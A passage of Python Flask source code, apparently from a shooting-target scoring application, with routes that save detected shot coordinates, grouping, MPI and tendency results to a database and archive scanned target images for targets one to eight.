        mpit = mpi(1, centroids)
        xmpi1 = mpit[:, 1]
        ympi1 = 2000 - mpit[:, 0]
        f1, firt_x, firt_y = firing_tendancy(1000, 1000, xmpi1, ympi1)
        fir_tendency_txt, fir_tendency_code = getfiringtendencytext(f1, firt_x, firt_y)
        # Bug fix: stale copy-paste debug label corrected to this function.
        print("calling from prediction_calculation_8")
        gp_1 = grouping_length(0, 0, x, y)
        result_1 = getresulttext(gp_1)
    return (firer_id, sess_id, detail_id, target_no, set_no, paper_ref,
            X_json, Y_json, xmpi1, ympi1, f1, gp_1, firt_x, firt_y,
            data_x_1, data_y_1, result_1, fir_tendency_txt)
@app.route('/save_adhoc_1/', methods=['GET', 'POST'])
def save_adhoc_1():
    # Placeholder ad-hoc save endpoint: currently persists nothing and only
    # returns to the target-1 summary page.
    return redirect(url_for('previous_page_target_1'))
@app.route('/save_1/', methods=['GET', 'POST'])
def save_call_1():
    # Persist the detection results for target 1: shot coordinates, MPI,
    # grouping and the scanned target image. User corrections made in the
    # plotting UI are read back from the Flask session ('x1', 'y1',
    # 'gp_u_1', ...). Refuses to save the same detail twice via save_flag.
    print("this is save_call_1",file=sys.stderr)
    final_x=[]
    final_y=[]
    tend_f_x_t = None
    tend_f_y_t = None
    x_list=None
    y_list=None
    if request.method == 'POST':
        curr_date=date.today()
        # 18-tuple from the detection pipeline; o and p (raw detail rows)
        # are unpacked but unused in this view.
        firer_id,session_id,detail_no,target_no,set_no,paper_no,x,y,mx1,my1,tendency,grouping_length,firt_x,firt_y,o,p,result,f=prediction_calculation_1()
        t1= session.get('tmpi',None)
        Tupdate=db.session.query(TShooting).scalar()
        # Bail out if this detail was already saved.
        if(Tupdate.save_flag==1):
            return render_template('errors/error_save.html')
        else:
            print("t1",file=sys.stderr)
            print(t1,file=sys.stderr)
            print(f,file=sys.stderr)
            # Guard against a missing user-adjusted MPI in the session.
            if(t1 is None):
                f_mpix_1=0
            else:
                f_mpix_1 = t1[ : 1 ]
                f_mpiy_1=t1[ : 0 ]
            # User-adjusted values stored by the plotting UI, if any.
            final_x_1 = session.get('x1', None)
            final_y_1 = session.get('y1', None)
            print(session.get('x1'),file=sys.stderr)
            print("final_x_1",file=sys.stderr)
            print(final_x_1,file=sys.stderr)
            gp_1_f=session.get('gp_u_1', None)
            res_u_1=session.get('res_u_1',None)
            tend_f = session.get('tf_u_1', None)
            tend_f_x = session.get('tfirer_x1', None)
            tend_f_y = session.get('tfirer_y1', None)
            tend_f_x_1 = session.get('tfirer_x1_f', None)
            tend_f_y_1 = session.get('tfirer_y1_f', None)
            # x/y arrive as JSON array strings like "[1.0,2.0]" (or 0 when
            # no shots were detected); strip the brackets and parse floats.
            if (x==0):
                x=0
                y=0
            else:
                x_len=len(x)
                y_len=len(y)
                x_ss=x[1:x_len-1]
                y_ss=y[1:y_len-1]
                x_split = x_ss.split(",")
                y_split = y_ss.split(",")
                x_list=[]
                y_list=[]
                for x_t in x_split:
                    x_list.append(float(x_t))
                for y_t in y_split:
                    y_list.append(float(y_t))
            print(final_x_1,file=sys.stderr)
            # Persist shots, MPI/tendency, and grouping in that order.
            box = savein_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,x_list,y_list,final_x_1,final_y_1)
            mpi=savempi_db(detail_no,target_no,paper_no,firer_id,firt_x,firt_y,tendency,session_id,set_no,tend_f,tend_f_x ,tend_f_y,tend_f_x_1,tend_f_y_1,f)
            gp=savegp_db(firer_id,session_id,detail_no,target_no,set_no,paper_no,grouping_length,gp_1_f,res_u_1,result)
            # Mark both the live TShooting row and the session detail saved.
            Tupdate.save_flag=1
            db.session.commit()
            Supdate=db.session.query(Session_Detail).filter(
                Session_Detail.session_id==session_id,
                Session_Detail.detail_no==detail_no
            ).scalar()
            Supdate.save_flag=1
            print(Supdate)
            db.session.commit()
            # Archive the scanned image and record its metadata.
            image_save=save_image_1(firer_id)
            image = image_record(
                date=time.strftime("%Y-%m-%d"),
                datetimestamp = time.strftime("%Y-%m-%d %H:%M"),
                session_id=session_id,
                detail_id=detail_no,
                firer_id=firer_id,
                target_no=target_no,
                set_no=set_no,
                paper_ref=paper_no,
                image_name=image_save
            )
            db.session.add(image)
            db.session.commit()
    return redirect(url_for('previous_page_target_1'))
@app.route('/save_2/', methods=['GET', 'POST'])
def save_call_2():
    """Persist detection results for target 2 and record the scanned image.

    POST runs prediction_calculation_2, merges user corrections from the
    Flask session, and writes shot, MPI, grouping and image records.
    GET redirects straight back to the summary page.
    """
    final_x_1 = []
    final_y_1 = []
    x_list = None
    y_list = None
    tend_f_x_t = None
    tend_f_y_t = None
    if request.method == 'POST':
        firer_id, session_id, detail_no, target_no, set_no, paper_no, x, y, mx1, my1, tendency, grouping_length, firt_x, firt_y, o, p, result, f = prediction_calculation_2()
        t1 = session.get('tmpi_2', None)
        # Bug fix: slicing t1 unguarded raised TypeError when the session
        # key was absent; save_call_1 already guards this case the same way.
        if t1 is None:
            f_mpix_1 = 0
        else:
            f_mpix_1 = t1[:1]
            f_mpiy_1 = t1[:0]
        final_x_1 = session.get('x2', None)
        final_y_1 = session.get('y2', None)
        gp_1_f = session.get('gp_u_2', None)
        res_u_1 = session.get('res_u_2', None)
        tend_f = session.get('tf_u_2', None)
        tend_f_x = session.get('tfirer_x2', None)
        tend_f_y = session.get('tfirer_y2', None)
        tend_f_x_1 = session.get('tfirer_x1_f', None)
        tend_f_y_1 = session.get('tfirer_y1_f', None)
        # x/y arrive as JSON array strings like "[1.0,2.0]" (or 0 when no
        # shots were detected); strip the brackets and parse floats.
        if x == 0:
            x = 0
            y = 0
        else:
            x_ss = x[1:len(x) - 1]
            y_ss = y[1:len(y) - 1]
            x_list = []
            y_list = []
            for x_t in x_ss.split(","):
                x_list.append(float(x_t))
            for y_t in y_ss.split(","):
                y_list.append(float(y_t))
        print(x_list, file=sys.stderr)
        box = savein_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, x_list, y_list, final_x_1, final_y_1)
        # NOTE(review): save_call_1 passes the extra trailing argument f to
        # savempi_db and result to savegp_db -- confirm whether these calls
        # should match.
        mpi = savempi_db(detail_no, target_no, paper_no, firer_id, firt_x, firt_y, tendency, session_id, set_no, tend_f, tend_f_x, tend_f_y, tend_f_x_1, tend_f_y_1)
        gp = savegp_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, grouping_length, gp_1_f, res_u_1)
        image_save = save_image_2(firer_id)
        image = image_record(
            # Bug fix: "%x" is locale-dependent; use the ISO date format
            # written by every other record in this module.
            date=time.strftime("%Y-%m-%d"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=session_id,
            detail_id=detail_no,
            firer_id=firer_id,
            target_no=target_no,
            set_no=set_no,
            paper_ref=paper_no,
            image_name=image_save,
        )
        db.session.add(image)
        db.session.commit()
    return redirect(url_for('previous_page_target_1'))
@app.route('/save_3/', methods=['GET', 'POST'])
def save_call_3():
    """Persist detection results for target 3 and record the scanned image.

    POST runs prediction_calculation_3, merges user corrections from the
    Flask session, and writes shot, MPI, grouping and image records.
    GET redirects straight back to the summary page.
    """
    final_x_1 = []
    final_y_1 = []
    x_list = None
    y_list = None
    tend_f_x_t = None
    tend_f_y_t = None
    if request.method == 'POST':
        firer_id, session_id, detail_no, target_no, set_no, paper_no, x, y, mx1, my1, tendency, grouping_length, firt_x, firt_y, o, p, result, f = prediction_calculation_3()
        t1 = session.get('tmpi_2', None)
        # Bug fix: slicing t1 unguarded raised TypeError when the session
        # key was absent; save_call_1 already guards this case the same way.
        if t1 is None:
            f_mpix_1 = 0
        else:
            f_mpix_1 = t1[:1]
            f_mpiy_1 = t1[:0]
        final_x_1 = session.get('x2', None)
        final_y_1 = session.get('y2', None)
        gp_1_f = session.get('gp_u_2', None)
        res_u_1 = session.get('res_u_2', None)
        tend_f = session.get('tf_u_2', None)
        tend_f_x = session.get('tfirer_x2', None)
        tend_f_y = session.get('tfirer_y2', None)
        tend_f_x_1 = session.get('tfirer_x1_f', None)
        tend_f_y_1 = session.get('tfirer_y1_f', None)
        # x/y arrive as JSON array strings like "[1.0,2.0]" (or 0 when no
        # shots were detected); strip the brackets and parse floats.
        if x == 0:
            x = 0
            y = 0
        else:
            x_ss = x[1:len(x) - 1]
            y_ss = y[1:len(y) - 1]
            x_list = []
            y_list = []
            for x_t in x_ss.split(","):
                x_list.append(float(x_t))
            for y_t in y_ss.split(","):
                y_list.append(float(y_t))
        print(x_list, file=sys.stderr)
        box = savein_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, x_list, y_list, final_x_1, final_y_1)
        # NOTE(review): save_call_1 passes the extra trailing argument f to
        # savempi_db and result to savegp_db -- confirm whether these calls
        # should match.
        mpi = savempi_db(detail_no, target_no, paper_no, firer_id, firt_x, firt_y, tendency, session_id, set_no, tend_f, tend_f_x, tend_f_y, tend_f_x_1, tend_f_y_1)
        gp = savegp_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, grouping_length, gp_1_f, res_u_1)
        image_save = save_image_3(firer_id)
        image = image_record(
            # Bug fix: "%x" is locale-dependent; use the ISO date format
            # written by every other record in this module.
            date=time.strftime("%Y-%m-%d"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=session_id,
            detail_id=detail_no,
            firer_id=firer_id,
            target_no=target_no,
            set_no=set_no,
            paper_ref=paper_no,
            image_name=image_save,
        )
        db.session.add(image)
        db.session.commit()
    return redirect(url_for('previous_page_target_1'))
@app.route('/save_4/', methods=['GET', 'POST'])
def save_call_4():
    """Persist detection results for target 4 and record the scanned image.

    POST runs prediction_calculation_4, merges user corrections from the
    Flask session, and writes shot, MPI, grouping and image records.
    GET redirects straight back to the summary page.
    """
    final_x_1 = []
    final_y_1 = []
    x_list = None
    y_list = None
    tend_f_x_t = None
    tend_f_y_t = None
    if request.method == 'POST':
        firer_id, session_id, detail_no, target_no, set_no, paper_no, x, y, mx1, my1, tendency, grouping_length, firt_x, firt_y, o, p, result, f = prediction_calculation_4()
        t1 = session.get('tmpi_2', None)
        # Bug fix: slicing t1 unguarded raised TypeError when the session
        # key was absent; save_call_1 already guards this case the same way.
        if t1 is None:
            f_mpix_1 = 0
        else:
            f_mpix_1 = t1[:1]
            f_mpiy_1 = t1[:0]
        final_x_1 = session.get('x2', None)
        final_y_1 = session.get('y2', None)
        gp_1_f = session.get('gp_u_2', None)
        res_u_1 = session.get('res_u_2', None)
        tend_f = session.get('tf_u_2', None)
        tend_f_x = session.get('tfirer_x2', None)
        tend_f_y = session.get('tfirer_y2', None)
        tend_f_x_1 = session.get('tfirer_x1_f', None)
        tend_f_y_1 = session.get('tfirer_y1_f', None)
        # x/y arrive as JSON array strings like "[1.0,2.0]" (or 0 when no
        # shots were detected); strip the brackets and parse floats.
        if x == 0:
            x = 0
            y = 0
        else:
            x_ss = x[1:len(x) - 1]
            y_ss = y[1:len(y) - 1]
            x_list = []
            y_list = []
            for x_t in x_ss.split(","):
                x_list.append(float(x_t))
            for y_t in y_ss.split(","):
                y_list.append(float(y_t))
        print(x_list, file=sys.stderr)
        box = savein_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, x_list, y_list, final_x_1, final_y_1)
        # NOTE(review): save_call_1 passes the extra trailing argument f to
        # savempi_db and result to savegp_db -- confirm whether these calls
        # should match.
        mpi = savempi_db(detail_no, target_no, paper_no, firer_id, firt_x, firt_y, tendency, session_id, set_no, tend_f, tend_f_x, tend_f_y, tend_f_x_1, tend_f_y_1)
        gp = savegp_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, grouping_length, gp_1_f, res_u_1)
        image_save = save_image_4(firer_id)
        image = image_record(
            # Bug fix: "%x" is locale-dependent; use the ISO date format
            # written by every other record in this module.
            date=time.strftime("%Y-%m-%d"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=session_id,
            detail_id=detail_no,
            firer_id=firer_id,
            target_no=target_no,
            set_no=set_no,
            paper_ref=paper_no,
            image_name=image_save,
        )
        db.session.add(image)
        db.session.commit()
    return redirect(url_for('previous_page_target_1'))
@app.route('/save_5/', methods=['GET', 'POST'])
def save_call_5():
    """Persist detection results for target 5 and record the scanned image.

    POST runs prediction_calculation_5, merges user corrections from the
    Flask session, and writes shot, MPI, grouping and image records.
    GET redirects straight back to the summary page.
    """
    final_x_1 = []
    final_y_1 = []
    x_list = None
    y_list = None
    tend_f_x_t = None
    tend_f_y_t = None
    if request.method == 'POST':
        firer_id, session_id, detail_no, target_no, set_no, paper_no, x, y, mx1, my1, tendency, grouping_length, firt_x, firt_y, o, p, result, f = prediction_calculation_5()
        t1 = session.get('tmpi_2', None)
        # Bug fix: slicing t1 unguarded raised TypeError when the session
        # key was absent; save_call_1 already guards this case the same way.
        if t1 is None:
            f_mpix_1 = 0
        else:
            f_mpix_1 = t1[:1]
            f_mpiy_1 = t1[:0]
        final_x_1 = session.get('x2', None)
        final_y_1 = session.get('y2', None)
        gp_1_f = session.get('gp_u_2', None)
        res_u_1 = session.get('res_u_2', None)
        tend_f = session.get('tf_u_2', None)
        tend_f_x = session.get('tfirer_x2', None)
        tend_f_y = session.get('tfirer_y2', None)
        tend_f_x_1 = session.get('tfirer_x1_f', None)
        tend_f_y_1 = session.get('tfirer_y1_f', None)
        # x/y arrive as JSON array strings like "[1.0,2.0]" (or 0 when no
        # shots were detected); strip the brackets and parse floats.
        if x == 0:
            x = 0
            y = 0
        else:
            x_ss = x[1:len(x) - 1]
            y_ss = y[1:len(y) - 1]
            x_list = []
            y_list = []
            for x_t in x_ss.split(","):
                x_list.append(float(x_t))
            for y_t in y_ss.split(","):
                y_list.append(float(y_t))
        print(x_list, file=sys.stderr)
        box = savein_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, x_list, y_list, final_x_1, final_y_1)
        # NOTE(review): save_call_1 passes the extra trailing argument f to
        # savempi_db and result to savegp_db -- confirm whether these calls
        # should match.
        mpi = savempi_db(detail_no, target_no, paper_no, firer_id, firt_x, firt_y, tendency, session_id, set_no, tend_f, tend_f_x, tend_f_y, tend_f_x_1, tend_f_y_1)
        gp = savegp_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, grouping_length, gp_1_f, res_u_1)
        image_save = save_image_5(firer_id)
        image = image_record(
            # Bug fix: "%x" is locale-dependent; use the ISO date format
            # written by every other record in this module.
            date=time.strftime("%Y-%m-%d"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=session_id,
            detail_id=detail_no,
            firer_id=firer_id,
            target_no=target_no,
            set_no=set_no,
            paper_ref=paper_no,
            image_name=image_save,
        )
        db.session.add(image)
        db.session.commit()
    return redirect(url_for('previous_page_target_5'))
@app.route('/save_6/', methods=['GET', 'POST'])
def save_call_6():
    """Persist detection results for target 6 and record the scanned image.

    POST runs prediction_calculation_6, merges user corrections from the
    Flask session, and writes shot, MPI, grouping and image records.
    GET redirects straight back to the summary page.
    """
    final_x_1 = []
    final_y_1 = []
    x_list = None
    y_list = None
    tend_f_x_t = None
    tend_f_y_t = None
    if request.method == 'POST':
        firer_id, session_id, detail_no, target_no, set_no, paper_no, x, y, mx1, my1, tendency, grouping_length, firt_x, firt_y, o, p, result, f = prediction_calculation_6()
        t1 = session.get('tmpi_2', None)
        # Bug fix: slicing t1 unguarded raised TypeError when the session
        # key was absent; save_call_1 already guards this case the same way.
        if t1 is None:
            f_mpix_1 = 0
        else:
            f_mpix_1 = t1[:1]
            f_mpiy_1 = t1[:0]
        final_x_1 = session.get('x2', None)
        final_y_1 = session.get('y2', None)
        gp_1_f = session.get('gp_u_2', None)
        res_u_1 = session.get('res_u_2', None)
        tend_f = session.get('tf_u_2', None)
        tend_f_x = session.get('tfirer_x2', None)
        tend_f_y = session.get('tfirer_y2', None)
        tend_f_x_1 = session.get('tfirer_x1_f', None)
        tend_f_y_1 = session.get('tfirer_y1_f', None)
        # x/y arrive as JSON array strings like "[1.0,2.0]" (or 0 when no
        # shots were detected); strip the brackets and parse floats.
        if x == 0:
            x = 0
            y = 0
        else:
            x_ss = x[1:len(x) - 1]
            y_ss = y[1:len(y) - 1]
            x_list = []
            y_list = []
            for x_t in x_ss.split(","):
                x_list.append(float(x_t))
            for y_t in y_ss.split(","):
                y_list.append(float(y_t))
        print(x_list, file=sys.stderr)
        box = savein_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, x_list, y_list, final_x_1, final_y_1)
        # NOTE(review): save_call_1 passes the extra trailing argument f to
        # savempi_db and result to savegp_db -- confirm whether these calls
        # should match.
        mpi = savempi_db(detail_no, target_no, paper_no, firer_id, firt_x, firt_y, tendency, session_id, set_no, tend_f, tend_f_x, tend_f_y, tend_f_x_1, tend_f_y_1)
        gp = savegp_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, grouping_length, gp_1_f, res_u_1)
        image_save = save_image_6(firer_id)
        image = image_record(
            # Bug fix: "%x" is locale-dependent; use the ISO date format
            # written by every other record in this module.
            date=time.strftime("%Y-%m-%d"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=session_id,
            detail_id=detail_no,
            firer_id=firer_id,
            target_no=target_no,
            set_no=set_no,
            paper_ref=paper_no,
            image_name=image_save,
        )
        db.session.add(image)
        db.session.commit()
    return redirect(url_for('previous_page_target_5'))
@app.route('/save_7/', methods=['GET', 'POST'])
def save_call_7():
    """Persist detection results for target 7 and record the scanned image.

    POST runs prediction_calculation_7, merges user corrections from the
    Flask session, and writes shot, MPI, grouping and image records.
    GET redirects straight back to the summary page.
    """
    final_x_1 = []
    final_y_1 = []
    x_list = None
    y_list = None
    tend_f_x_t = None
    tend_f_y_t = None
    if request.method == 'POST':
        firer_id, session_id, detail_no, target_no, set_no, paper_no, x, y, mx1, my1, tendency, grouping_length, firt_x, firt_y, o, p, result, f = prediction_calculation_7()
        t1 = session.get('tmpi_2', None)
        # Bug fix: slicing t1 unguarded raised TypeError when the session
        # key was absent; save_call_1 already guards this case the same way.
        if t1 is None:
            f_mpix_1 = 0
        else:
            f_mpix_1 = t1[:1]
            f_mpiy_1 = t1[:0]
        final_x_1 = session.get('x2', None)
        final_y_1 = session.get('y2', None)
        gp_1_f = session.get('gp_u_2', None)
        res_u_1 = session.get('res_u_2', None)
        tend_f = session.get('tf_u_2', None)
        tend_f_x = session.get('tfirer_x2', None)
        tend_f_y = session.get('tfirer_y2', None)
        tend_f_x_1 = session.get('tfirer_x1_f', None)
        tend_f_y_1 = session.get('tfirer_y1_f', None)
        # x/y arrive as JSON array strings like "[1.0,2.0]" (or 0 when no
        # shots were detected); strip the brackets and parse floats.
        if x == 0:
            x = 0
            y = 0
        else:
            x_ss = x[1:len(x) - 1]
            y_ss = y[1:len(y) - 1]
            x_list = []
            y_list = []
            for x_t in x_ss.split(","):
                x_list.append(float(x_t))
            for y_t in y_ss.split(","):
                y_list.append(float(y_t))
        print(x_list, file=sys.stderr)
        box = savein_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, x_list, y_list, final_x_1, final_y_1)
        # NOTE(review): save_call_1 passes the extra trailing argument f to
        # savempi_db and result to savegp_db -- confirm whether these calls
        # should match.
        mpi = savempi_db(detail_no, target_no, paper_no, firer_id, firt_x, firt_y, tendency, session_id, set_no, tend_f, tend_f_x, tend_f_y, tend_f_x_1, tend_f_y_1)
        gp = savegp_db(firer_id, session_id, detail_no, target_no, set_no, paper_no, grouping_length, gp_1_f, res_u_1)
        image_save = save_image_7(firer_id)
        image = image_record(
            # Bug fix: "%x" is locale-dependent; use the ISO date format
            # written by every other record in this module.
            date=time.strftime("%Y-%m-%d"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=session_id,
            detail_id=detail_no,
            firer_id=firer_id,
            target_no=target_no,
            set_no=set_no,
            paper_ref=paper_no,
            image_name=image_save,
        )
        db.session.add(image)
        db.session.commit()
    return redirect(url_for('previous_page_target_5'))
@app.route('/save_8/', methods=['GET', 'POST'])
def save_call_8():
    """Persist the shot data, MPI, grouping and result image for target 8.

    Merges the automatically predicted values for target 8 with any
    operator-edited values cached in the session, writes the firer
    detail / MPI / grouping rows, archives the rendered target image,
    then returns to the target overview page.
    """
    x_list = None
    y_list = None
    if request.method == 'POST':
        (firer_id, session_id, detail_no, target_no, set_no, paper_no,
         x, y, mx1, my1, tendency, grouping_length, firt_x, firt_y,
         o, p, result, f) = prediction_calculation_8()
        # Operator-edited overrides stored by the edit views; None when
        # the operator made no changes.
        final_x_1 = session.get('x2', None)
        final_y_1 = session.get('y2', None)
        gp_1_f = session.get('gp_u_2', None)
        res_u_1 = session.get('res_u_2', None)
        tend_f = session.get('tf_u_2', None)
        tend_f_x = session.get('tfirer_x2', None)
        tend_f_y = session.get('tfirer_y2', None)
        tend_f_x_1 = session.get('tfirer_x1_f', None)
        tend_f_y_1 = session.get('tfirer_y1_f', None)
        if (x == 0):
            # No shots detected on this paper.
            x = 0
            y = 0
        else:
            # x/y arrive as stringified lists, e.g. "[1.0, 2.0]": strip
            # the surrounding brackets and parse each element.
            x_ss = x[1:len(x) - 1]
            y_ss = y[1:len(y) - 1]
            x_list = [float(x_t) for x_t in x_ss.split(",")]
            y_list = [float(y_t) for y_t in y_ss.split(",")]
        print(x_list, file=sys.stderr)
        box = savein_db(firer_id, session_id, detail_no, target_no, set_no,
                        paper_no, x_list, y_list, final_x_1, final_y_1)
        # BUG FIX: savempi_db takes a trailing `f` (tendency text used when
        # no edited tendency exists) and savegp_db a trailing `result_p`
        # (predicted result used when no edited grouping exists); the
        # original calls omitted both and raised TypeError.
        mpi = savempi_db(detail_no, target_no, paper_no, firer_id, firt_x,
                         firt_y, tendency, session_id, set_no, tend_f,
                         tend_f_x, tend_f_y, tend_f_x_1, tend_f_y_1, f)
        gp = savegp_db(firer_id, session_id, detail_no, target_no, set_no,
                       paper_no, grouping_length, gp_1_f, res_u_1, result)
        image_save = save_image_8(firer_id)
        image = image_record(
            date=time.strftime("%x"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=session_id,
            detail_id=detail_no,
            firer_id=firer_id,
            target_no=target_no,
            set_no=set_no,
            paper_ref=paper_no,
            image_name=image_save
        )
        db.session.add(image)
        db.session.commit()
    return redirect(url_for('previous_page_target_5'))
def _add_firer_detail_pair(session_id, detail_no, target_no, set_no, paper_no,
                           firer_id, x_val, y_val, final_x_val, final_y_val):
    """Insert one shot row into both detail tables.

    T_Firer_Details first, then Firer_Details, each committed separately
    (same order and commit pattern as the original inline code).
    """
    for model in (T_Firer_Details, Firer_Details):
        row = model(
            date=time.strftime("%Y-%m-%d"),
            datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
            session_id=session_id,
            detail_id=detail_no,
            target_no=target_no,
            set_no=set_no,
            paper_ref=paper_no,
            firer_id=firer_id,
            x=x_val,
            y=y_val,
            final_x=final_x_val,
            final_y=final_y_val
        )
        db.session.add(row)
        db.session.commit()


def savein_db(firer_id, session_id, detail_no, target_no, set_no, paper_no,
              x, y, final_x, final_y):
    """Store the detected (x, y) and final/edited shot coordinates.

    Four cases, depending on which of the detected list (`x`/`y`) and
    edited list (`final_x`/`final_y`, stored as [[v], ...] columns) exist:
    * no edits: detected values double as final values;
    * no detections: final values stored with -1 raw placeholders;
    * fewer edits than detections: edited list padded with -1;
    * more edits than detections: detected list padded with -1.

    Returns True on success; redirects to the error page on any failure.
    """
    try:
        if final_x is None:
            # No operator edits: detected coordinates are also the finals.
            for i in range(len(x)):
                _add_firer_detail_pair(session_id, detail_no, target_no,
                                       set_no, paper_no, firer_id,
                                       x[i], y[i], x[i], y[i])
        elif x is None:
            # Only edited shots exist: raw coordinates unknown, pad -1.
            f_x, f_y = making_array_null(x, y, len(final_x))
            for i in range(len(final_x)):
                _add_firer_detail_pair(session_id, detail_no, target_no,
                                       set_no, paper_no, firer_id,
                                       f_x[i], f_y[i],
                                       final_x[i][0], final_y[i][0])
        elif len(final_x) < len(x):
            # Operator removed shots: pad the edited list to match.
            f_x_f, f_y_f = making_array_del(final_x, final_y, len(x))
            for z in range(len(x)):
                _add_firer_detail_pair(session_id, detail_no, target_no,
                                       set_no, paper_no, firer_id,
                                       x[z], y[z], f_x_f[z], f_y_f[z])
        elif len(x) < len(final_x):
            # Operator added shots: pad the detected list to match.
            firer_x, firer_y = making_array_add(x, y, len(final_x))
            flat_x = [pt[0] for pt in final_x]
            flat_y = [pt[0] for pt in final_y]
            for z in range(len(flat_y)):
                _add_firer_detail_pair(session_id, detail_no, target_no,
                                       set_no, paper_no, firer_id,
                                       firer_x[z], firer_y[z],
                                       flat_x[z], flat_y[z])
        else:
            # Same count: pair them up directly. NOTE: the int() cast on
            # the finals existed only in this branch originally -- kept.
            flat_x = [pt[0] for pt in final_x]
            flat_y = [pt[0] for pt in final_y]
            for z in range(len(x)):
                _add_firer_detail_pair(session_id, detail_no, target_no,
                                       set_no, paper_no, firer_id,
                                       x[z], y[z],
                                       int(flat_x[z]), int(flat_y[z]))
    except Exception:
        return redirect(url_for('error_6'))
    return True
def making_array_null(x, y, l):
    """Return two length-`l` lists of -1 placeholders.

    Used when raw shot coordinates are unknown; `x` and `y` are accepted
    for call compatibility but never read.
    """
    placeholder_x = [-1] * l
    placeholder_y = [-1] * l
    return placeholder_x, placeholder_y
def save_image_1(firer_id):
    """Archive the rendered image for target 1 under a per-firer name.

    Copies static/img_dump/1.png into the image_db folder and renames the
    copy to "<firer_id>_<YYYY_MM_DD_HH_MM>.png". Returns the new name.
    """
    srcfile = 'E:/FRAS Windows/FRAS_production/static/img_dump/1.png'
    dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
    shutil.copy(srcfile, dstdir)
    stamp = time.strftime("%Y_%m_%d_%H_%M")
    newfilename = str(firer_id) + "_" + stamp + ".png"
    old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "1.png")
    new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
    os.rename(old_file, new_file)
    return newfilename
def save_image_2(firer_id):
    """Archive the rendered image for target 2 under a per-firer name.

    Copies static/img_dump/2.png into the image_db folder and renames the
    copy to "<firer_id>_<YYYY_MM_DD_HH_MM>.png". Returns the new name.
    """
    srcfile = 'E:/FRAS Windows/FRAS_production/static/img_dump/2.png'
    dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
    shutil.copy(srcfile, dstdir)
    stamp = time.strftime("%Y_%m_%d_%H_%M")
    newfilename = str(firer_id) + "_" + stamp + ".png"
    old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "2.png")
    new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
    os.rename(old_file, new_file)
    return newfilename
def save_image_3(firer_id):
    """Archive the rendered image for target 3 under a per-firer name.

    BUG FIX: srcfile pointed at 'E:/FRAS_production/...' while the crop
    pipeline and save_image_1/2 use 'E:/FRAS Windows/FRAS_production/...';
    the copy could never find the dump file. Path made consistent.
    """
    srcfile = 'E:/FRAS Windows/FRAS_production/static/img_dump/3.png'
    dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
    shutil.copy(srcfile, dstdir)
    stamp = time.strftime("%Y_%m_%d_%H_%M")
    newfilename = str(firer_id) + "_" + stamp + ".png"
    old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "3.png")
    new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
    os.rename(old_file, new_file)
    return newfilename
def save_image_4(firer_id):
    """Archive the rendered image for target 4 under a per-firer name.

    BUG FIX: srcfile pointed at 'E:/FRAS_production/...' while the crop
    pipeline and save_image_1/2 use 'E:/FRAS Windows/FRAS_production/...';
    the copy could never find the dump file. Path made consistent.
    """
    srcfile = 'E:/FRAS Windows/FRAS_production/static/img_dump/4.png'
    dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
    shutil.copy(srcfile, dstdir)
    stamp = time.strftime("%Y_%m_%d_%H_%M")
    newfilename = str(firer_id) + "_" + stamp + ".png"
    old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "4.png")
    new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
    os.rename(old_file, new_file)
    return newfilename
def save_image_5(firer_id):
    """Archive the rendered image for target 5 under a per-firer name.

    BUG FIX: srcfile pointed at 'E:/FRAS_production/...' while the crop
    pipeline and save_image_1/2 use 'E:/FRAS Windows/FRAS_production/...';
    the copy could never find the dump file. Path made consistent.
    """
    srcfile = 'E:/FRAS Windows/FRAS_production/static/img_dump/5.png'
    dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
    shutil.copy(srcfile, dstdir)
    stamp = time.strftime("%Y_%m_%d_%H_%M")
    newfilename = str(firer_id) + "_" + stamp + ".png"
    old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "5.png")
    new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
    os.rename(old_file, new_file)
    return newfilename
def save_image_6(firer_id):
    """Archive the rendered image for target 6 under a per-firer name.

    BUG FIX: srcfile pointed at 'E:/FRAS_production/...' while the crop
    pipeline and save_image_1/2 use 'E:/FRAS Windows/FRAS_production/...';
    the copy could never find the dump file. Path made consistent.
    """
    srcfile = 'E:/FRAS Windows/FRAS_production/static/img_dump/6.png'
    dstdir = 'E:/FRAS Windows/FRAS_production/static/image_db'
    shutil.copy(srcfile, dstdir)
    stamp = time.strftime("%Y_%m_%d_%H_%M")
    newfilename = str(firer_id) + "_" + stamp + ".png"
    old_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", "6.png")
    new_file = os.path.join("E:/FRAS Windows/FRAS_production/static/image_db", newfilename)
    os.rename(old_file, new_file)
    return newfilename
def save_image_7(firer_id):
    """Archive the rendered image for target 7 under a per-firer name.

